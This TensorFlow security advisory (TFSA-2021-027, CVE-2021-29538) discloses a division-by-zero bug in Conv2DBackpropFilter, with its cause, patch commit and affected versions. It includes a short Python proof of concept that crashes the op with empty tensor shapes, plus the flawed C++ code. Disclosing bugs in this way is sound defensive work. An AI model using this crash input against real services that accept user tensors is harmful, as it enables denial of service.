• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1## TFSA-2021-027: Division by zero in `Conv2DBackpropFilter`
2
3### CVE Number
4CVE-2021-29538
5
6### Impact
7An attacker can cause a division by zero to occur in `Conv2DBackpropFilter`:
8
9```python
10import tensorflow as tf
11
12input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
13filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32)
14out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
15
16tf.raw_ops.Conv2DBackpropFilter(
17  input=input_tensor,
18  filter_sizes=filter_sizes,
19  out_backprop=out_backprop,
20  strides=[1, 1, 1, 1],
21  use_cudnn_on_gpu=False,
22  padding='SAME',
23  explicit_paddings=[],
24  data_format='NHWC',
25  dilations=[1, 1, 1, 1]
26)
27```
28
29This is because the
30[implementation](https://github.com/tensorflow/tensorflow/blob/1b0296c3b8dd9bd948f924aa8cd62f87dbb7c3da/tensorflow/core/kernels/conv_grad_filter_ops.cc#L513-L522)
31computes a divisor based on user provided data (i.e., the shape of the tensors
32given as arguments):
33
34```cc
35const size_t size_A = output_image_size * filter_total_size;
36const size_t size_B = output_image_size * dims.out_depth;
37const size_t size_C = filter_total_size * dims.out_depth;
38const size_t work_unit_size = size_A + size_B + size_C;
39const size_t shard_size = (target_working_set_size + work_unit_size - 1) / work_unit_size;
40```
41
42If all shapes are empty then `work_unit_size` is 0. Since there is no check for
43this case before division, this results in a runtime exception, with potential
44to be abused for a denial of service.
45
46### Patches
47We have patched the issue in GitHub commit
48[c570e2ecfc822941335ad48f6e10df4e21f11c96](https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96).
49
50The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
51commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
522.1.4, as these are also affected and still in supported range.
53
54### For more information
55Please consult [our security
56guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
57more information regarding the security model and how to contact us with issues
58and questions.
59
60### Attribution
61This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
62X-Team.
63